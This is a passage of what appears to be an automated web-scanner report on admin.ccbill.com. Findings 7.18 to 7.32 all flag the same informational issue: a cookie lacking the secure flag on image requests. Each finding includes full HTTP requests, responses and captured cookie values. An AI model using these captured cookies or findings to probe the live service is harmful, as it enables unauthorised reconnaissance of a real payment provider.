Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:17 GMT
Last-Modified: Thu, 28 Jun 2007 17:58:59 GMT
ETag: "c9e92-1-433fb1df13ec0"
Accept-Ranges: bytes
Content-Length: 1
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

7.18. https://admin.ccbill.com/images/ccb_AffiliateSystemBanner.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_AffiliateSystemBanner.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_AffiliateSystemBanner.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:07 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:40 GMT
ETag: "3070d-d48-48f3a34968f00"
Accept-Ranges: bytes
Content-Length: 3400
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89al.Q..........\{.............nps...s..
..............z..............PQShj................'')o.....................................7Sn...Sh}...............^_a..................?@C......~.........
...[SNIP]...

7.19. https://admin.ccbill.com/images/ccb_AffiliateSystemBkg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_AffiliateSystemBkg.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_AffiliateSystemBkg.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:07 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "57ea2-5b9-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1465
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

7.20. https://admin.ccbill.com/images/ccb_ClientSupportAreaBkg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_ClientSupportAreaBkg.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_ClientSupportAreaBkg.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:04 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "1680fa4-af0-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 2800
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

7.21. https://admin.ccbill.com/images/ccb_LearnMoreBtn.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_LearnMoreBtn.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_LearnMoreBtn.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:05 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "51ebb8-3cb-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 971
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89aL.......N..M..O..M..N.............Pw................Px....Pw.............'Y.k.....'X.5b....5c.6d.y.....Bm.5c....Ov.}..l.....%W..........Jt....|..Ov.......$T.Cn.6d..........z..%V.......y..Hp....C
...[SNIP]...

7.22. https://admin.ccbill.com/images/ccb_LoginBoxBottom.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_LoginBoxBottom.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_LoginBoxBottom.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:08 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "51ebb9-73e-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1854
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89aJ.!...............................................................................................................................................................................................
...[SNIP]...

7.23. https://admin.ccbill.com/images/ccb_LoginBoxDiv.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_LoginBoxDiv.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_LoginBoxDiv.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:07 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "1680fa7-10c-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 268
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a.............!.......,..................4m..+.\..n_HJc..g.R...p).amwx.......&".H."......r.RW.B.f.[h..]..cc.x..}k^;...gsX.uo.Wl_.7..2.Rx..q......x... R.5.....p9....3.PjU..s..q
......8{.J..;Z+...
...[SNIP]...

7.24. https://admin.ccbill.com/images/ccb_LoginBoxLeft.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_LoginBoxLeft.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_LoginBoxLeft.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:04 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "51ebbb-45b-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1115
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a.......................................................................................................!.......,........... &...E
WM..A@,.4 .D.=..j..P&..

F.qX.$...8.|......
1.....:..ox..4&.W...
...[SNIP]...

7.25. https://admin.ccbill.com/images/ccb_LoginBoxRight.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_LoginBoxRight.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_LoginBoxRight.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:08 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "57eaa-450-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1104
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a.......................................................................................................!.......,........... .d DY5I..<.@..f....W.=......(....X0..K.x.8..&...N......n,."...I......
...[SNIP]...

7.26. https://admin.ccbill.com/images/ccb_LoginBoxTop.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_LoginBoxTop.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_LoginBoxTop.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:05 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "1680faa-6ea-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1770
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89aJ......................................................................................................!.......,....J...... .dI>h.Bl..p,.tm.x..|....pH,....r.l:...t.l.TX.v.-aQ..`L.....z.n....|N.
...[SNIP]...

7.27. https://admin.ccbill.com/images/ccb_OnlineSupportBox1Bkg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_OnlineSupportBox1Bkg.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_OnlineSupportBox1Bkg.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:05 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "51ebbe-394-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 916
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

7.28. https://admin.ccbill.com/images/ccb_OnlineSupportBox2Bkg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_OnlineSupportBox2Bkg.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_OnlineSupportBox2Bkg.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:05 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "30718-3e9-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1001
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

7.29. https://admin.ccbill.com/images/ccb_OnlineSupportBox3Bkg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_OnlineSupportBox3Bkg.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_OnlineSupportBox3Bkg.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:06 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "35f28d-359-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 857
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

7.30. https://admin.ccbill.com/images/ccb_SupportBarBottom.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_SupportBarBottom.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_SupportBarBottom.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:09 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "57eaf-4bb-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1211
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89aJ......................................................................................................!.......,....J.......#.d...4.R1.Q.P..a..9]....bH,....r.l:...tJ.Z...v..z...xL.....O.s.....Ci
...[SNIP]...

7.31. https://admin.ccbill.com/images/ccb_SupportBarDiv.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_SupportBarDiv.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_SupportBarDiv.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:08 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "1680faf-45-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 69
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a..c..........!.......,......c.............*.0......DV.uf...k..;

7.32. https://admin.ccbill.com/images/ccb_SupportBarLeft.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/images/ccb_SupportBarLeft.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_SupportBarLeft.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:08 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "35f290-304-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 772
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a..c....................................................................................................!.......,......c.....".S...qX..,...ER..dC2.......h..n.)...RPsh.b..g.xz......>f.-....P.!...
...[SNIP]...

